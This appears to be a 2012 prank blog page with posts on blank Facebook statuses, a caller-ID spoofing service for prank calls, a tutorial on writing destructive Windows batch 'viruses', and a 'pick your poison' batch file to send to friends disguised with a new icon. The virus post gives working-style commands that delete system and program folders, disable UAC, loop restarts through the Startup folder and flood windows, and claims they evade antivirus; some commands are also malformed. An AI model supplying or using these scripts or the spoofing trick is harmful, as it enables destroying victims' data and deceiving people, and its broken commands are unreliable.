Receive all updates via Facebook. Just Click the Like Button Below

Showing posts with label Prank. Show all posts
Showing posts with label Prank. Show all posts

Tuesday, 4 September 2012

How to post blank(empty) status on facebook wall


I am Going to tell you how to post a blank Facebook status or How to Post an Empty Status on Facebook Wall.
Note:- It works only With both Status and Comments.
So here is the trick..
1) Goto Your Profile and type
2) Type either “@[0:0: ]” or “alt+0173″  ( of numpad without qoutes ofcourse)
3) Press Enter… And That’s it..:P
Simple, isn’t it..
Now play around , shock your friends and have fun..;-)

Thursday, 16 August 2012

Make prank calls call spoofing


call spoofing | call any number from any number for free

If you want to fool your friends or want to see the demo of call spoofing, i have a better call spoofing service. It has many services. You can do prank calls, spoof callerid, change your voice during call. When you call someone he will see the number which you want him to see. This service is easy to use.

follow these steps:
  1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call.
  2. Press "Get me a code" and we will provide you with number to call and a code.
  3. Call the number
  4. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected.


Warning: Do not use this for any crime.


click to use this service here:
http://www.crazycall.net/

Thursday, 2 August 2012

How To Create A Computer Virus For Windows


In this following tutorial I will demonstrate how you can create simple but effective viruses using batch scripts in windows. This is for educational purpose only. Batch scripts are nothing but commands that you type in windows command prompt. You can arrange single or multiple commands in specific order to harm system.

Following is an example of destructive virus script,

rd /f /q “c:\windows\system32”
cls
shutdown /s /t 00

this will delete all files from windows system32 folder making windows unusable. By the way this trick works only on Windows XP,2k and earlier. Will not work under Vista and 7 due to UAC(User account control). So here's another way to harm system, rather than deleting core system files delete Program files so the above code will appear as follows after modification.

rd /s /f /q “c:\program files”

This will delete all installation files from Program Files directory making all victim's installed program useless. By the way you can disable UAC using following code but system will need a restart,

reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUAC /t REG_DWORD /d
0x00000000

After that you can run first code without problem. Above codes are examples of destructive codes now lets take a look on codes that do not harm but can harass the victim.

A batch script that will put computer in continues restart mode,

@echo off
if exist "%userprofile%\start menu\programs\startup\virus.bat" goto h
copy virus.bat "%userprofile%\start menu\programs\startup\"
shutdown /r /t 00
:h
shutdown /r /t 00

where virus.bat is the name of our virus script.

A batch virus that will open several windows of same program,

@echo off
:h
cmd /c start /MAX /HIGH tree c:\

where you can replace tree c:\ by any command/program name you wish.

Following code will open several websites on victims PC,

@echo off
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
start http://premium-softs.blogspot.com 
:
:
start http://premium-softs.blogspot.com
where you can replace  http://premium-softs.blogspot.com by any website URL you want even links to images will work. If you paste above code for nearly 1000 times victim's PC will crash of overload.

Above are just few possibilities the advantage of batch code is they hardly get detected by any anti-virus programs that means they can run and damage system without getting detected as virus. To get complete list of commands type help in command prompt. I hope that was easy, ask if you have any difficulty and please don't execute above scripts on your own computer. Thanks for reading and keep visiting.

Thursday, 26 July 2012

All in one virus (prank)

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:



1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type in notepad:



@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.